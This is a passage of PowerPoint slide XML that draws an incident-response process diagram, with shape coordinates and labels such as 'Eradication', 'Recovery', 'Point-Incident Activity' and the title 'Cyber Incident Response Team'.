                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503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8936481" y="5383783"/>
            <a:ext cx="13595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35">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Eradication</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif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0989818" y="4874005"/>
            <a:ext cx="1845310" cy="1360805"/>
            <a:chOff x="10989818" y="4874005"/>
            <a:chExt cx="1845310" cy="1360805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11002518" y="4886705"/>
              <a:ext cx="1819910" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819909" h="1335404">
                  <a:moveTo>
                    <a:pt x="1597152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754504" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152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1002518" y="4886705"/>
              <a:ext cx="1819910" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1819909" h="1335404">
                  <a:moveTo>
                    <a:pt x="0" y="222504"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754504" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="222504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819655" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815137" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802177" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781669" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754505" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721578" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683781" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642008" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597152" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65150" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222504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11360022" y="5375909"/>
            <a:ext cx="110490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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Recovery</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif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3286486" y="4866385"/>
            <a:ext cx="2021839" cy="1360805"/>
            <a:chOff x="13286486" y="4866385"/>
            <a:chExt cx="2021839" cy="1360805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13299186" y="4879085"/>
              <a:ext cx="1996439" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1996440" h="1335404">
                  <a:moveTo>
                    <a:pt x="1773935" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65151" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65151" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931288" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935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3299186" y="4879085"/>
              <a:ext cx="1996439" cy="1335405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1996440" h="1335404">
                  <a:moveTo>
                    <a:pt x="0" y="222503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4518" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65151" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="4518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="17478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="37986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931289" y="65150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="98077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="135874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="222503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996440" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991921" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978961" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958453" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931288" y="1269872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898362" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860565" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818792" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773935" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1335024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177647" y="1330505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135874" y="1317545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98077" y="1297037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65151" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37986" y="1236946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17478" y="1199149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518" y="1157376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1112520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="222503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13457682" y="5213680"/>
            <a:ext cx="1681480" cy="6381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2000" spc="50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Point-Incident</a:t>
            </a:r>
            <a:endParaRPr sz="20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dirty="0" sz="2000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif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356104" y="4654041"/>
            <a:ext cx="11960860" cy="2795270"/>
            <a:chOff x="2356104" y="4654041"/>
            <a:chExt cx="11960860" cy="2795270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3387852" y="5338571"/>
              <a:ext cx="9875520" cy="481965"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9875519" h="481964">
                  <a:moveTo>
                    <a:pt x="432816" y="240792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216408" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216408" y="240792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216408" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432816" y="240792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="9875519" h="481964">
                  <a:moveTo>
                    <a:pt x="2802636" y="240792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2585466" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2368296" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585466" y="240792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2368296" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585466" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802636" y="240792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="9875519" h="481964">
                  <a:moveTo>
                    <a:pt x="5277612" y="240792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5060442" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4843272" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5060442" y="240792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4843272" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5060442" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5277612" y="240792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="9875519" h="481964">
                  <a:moveTo>
                    <a:pt x="7600188" y="240792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7383018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7165848" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7383018" y="240792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7165848" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7383018" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7600188" y="240792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="9875519" h="481964">
                  <a:moveTo>
                    <a:pt x="9875507" y="240792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9658350" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9441180" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9658350" y="240792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9441180" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9658350" y="481584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9875507" y="240792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356104" y="4654041"/>
              <a:ext cx="11960860" cy="2795270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11960860" h="2795270">
                  <a:moveTo>
                    <a:pt x="9575419" y="19050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9573920" y="11633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9569844" y="5575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9563786" y="1498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9556369" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2440686" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433256" y="1498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2427198" y="5575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2423122" y="11633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421636" y="19050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421636" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2345436" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2440686" y="264160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2526411" y="92710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535936" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2459736" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2459736" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9537319" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9537319" y="232664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9575419" y="232664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9575419" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9575419" y="19050"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="11960860" h="2795270">
                  <a:moveTo>
                    <a:pt x="11960352" y="1560068"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11922252" y="1560068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11922252" y="2756662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="2756662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="1774317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="1774317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180975" y="1755267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="1583817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1774317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76200" y="1774317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76200" y="2775712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77685" y="2783141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81762" y="2789199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87820" y="2793276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="2794762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11941302" y="2794762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11948719" y="2793276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11954777" y="2789199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11958853" y="2783141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11960352" y="2775712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11960352" y="2756662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11960352" y="1560068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99023" y="306451"/>
            <a:ext cx="545465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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Team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07179" y="760476"/>
            <a:ext cx="8197596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585971" y="3195827"/>
            <a:ext cx="9714230" cy="995680"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="995679">
                <a:moveTo>
                  <a:pt x="9548114" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="165862" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121781" y="5927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82164" y="22653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48593" y="48593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22653" y="82164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5927" y="121781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="165862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="829310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5927" y="873390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22653" y="913007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48593" y="946578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82164" y="972518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121781" y="989244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165862" y="995172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548114" y="995172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592194" y="989244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9631811" y="972518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9665382" y="946578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691322" y="913007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708048" y="873390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="829310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713976" y="165862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9708048" y="121781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691322" y="82164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9665382" y="48593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9631811" y="22653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9592194" y="5927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548114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585971" y="4526279"/>
            <a:ext cx="9714230" cy="993775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="993775">
                <a:moveTo>
                  <a:pt x="9548368" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="165607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121590" y="5917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82032" y="22615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48514" y="48513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22615" y="82032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917" y="121590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="165608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="828040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917" y="872057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22615" y="911615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48513" y="945133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82032" y="971032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121590" y="987730"/>
                </a:lnTo>
                <a:lnTo>
